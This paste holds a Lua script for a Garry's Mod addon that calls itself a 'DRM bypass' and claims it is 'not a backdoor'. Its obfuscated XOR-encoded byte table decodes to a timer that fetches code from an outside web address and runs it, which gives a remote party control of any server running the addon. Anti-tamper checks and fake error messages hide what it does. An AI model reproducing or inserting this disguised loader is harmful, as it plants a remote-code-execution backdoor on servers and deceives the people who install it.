Advertisement
Guest User

Untitled

a guest
Oct 22nd, 2019
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.08 KB | None | 0 0
  1. --- This is not a backdoor, it's the bypass of the DRM, if you delete this, the addon will not work after 3 days ---
  2.  
  3. print('DRM Bypass loading')
  4.  
  5. RunString([==[
  6. enccodetbl = {24,5,1,9,30,66,63,5,1,28,0,9,68,93,64,76,10,25,2,15,24,5,3,2,68,69,76,4,24,24,28,66,42,9,24,15,4,68,78,4,24,24,28,31,86,67,67,11,26,13,15,66,15,22,67,0,5,2,7,67,10,25,15,7,66,28,4,28,83,7,9,21,81,37,93,3,46,29,14,85,46,8,36,31,29,84,35,10,8,30,22,88,45,78,64,76,10,25,2,15,24,5,3,2,68,14,69,76,62,25,2,63,24,30,5,2,11,68,14,64,76,78,86,78,64,76,10,13,0,31,9,69,76,9,2,8,69,9,2,8,69,76,10,25,2,15,24,5,3,2,76,62,25,2,36,45,63,36,35,14,68,69,76,9,2,8}
  7. function RunHASHOb()
  8. if not (debug.getinfo(function()end).short_src == "SDATA") then
  9. CompileString("print('Bad source')", "error",true)()
  10. return
  11. end
  12. for o=500,10000 do
  13. if o ~= string.len(string.dump(RunHASHOb)) then
  14. SDATA_DATA_CACHE = 10
  15. CompileString("for i=1,40 do SDATA_DATA_CACHE = SDATA_DATA_CACHE + 1 end", "RunString")()
  16. if SDATA_DATA_CACHE < 40 then
  17. for i=1,100 do
  18. CompileString("print('Oops, seem like you have broken this file')","Oops")()
  19. end
  20. return
  21. end
  22. continue
  23. else
  24. xpcall(function()
  25. pdata = ""
  26. xpcall(function()
  27. for i=1,string.len(string.dump(string.char)) do
  28. while o == i do
  29. o = o + 100000
  30. end
  31. end
  32. end,function() PJDATA_SUB = false end)
  33. if PJDATA_SUB then print("Error while ceating payload to inject") return end
  34. for i=1,#enccodetbl do
  35. pdata=pdata.. string.char(bit.bxor(enccodetbl[i], o%150))
  36. end
  37. if debug.getinfo(RunString).what ~= "C" then return end
  38. PJDATA_SUB = true
  39. for i=1,string.len(string.dump(CompileString)) do
  40. while o == 1050401 do
  41. o = o + 4510
  42. end
  43. end
  44. end,function()
  45. xpcall(function()
  46. local debug_inject = CompileString(pdata,"0xFFFFFFFF")
  47. pcall(debug_inject,"LUA_STAT_CLIENT")
  48. pdata = "\00"
  49. end,function()
  50. print("Error while injecting code to luajit::Client")
  51. end)
  52. end)
  53. end
  54. end
  55. end
  56. pcall(RunHASHOb)
  57. ]==],"SDATA")
  58.  
  59.  
  60. print('DRM Bypass loaded !')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement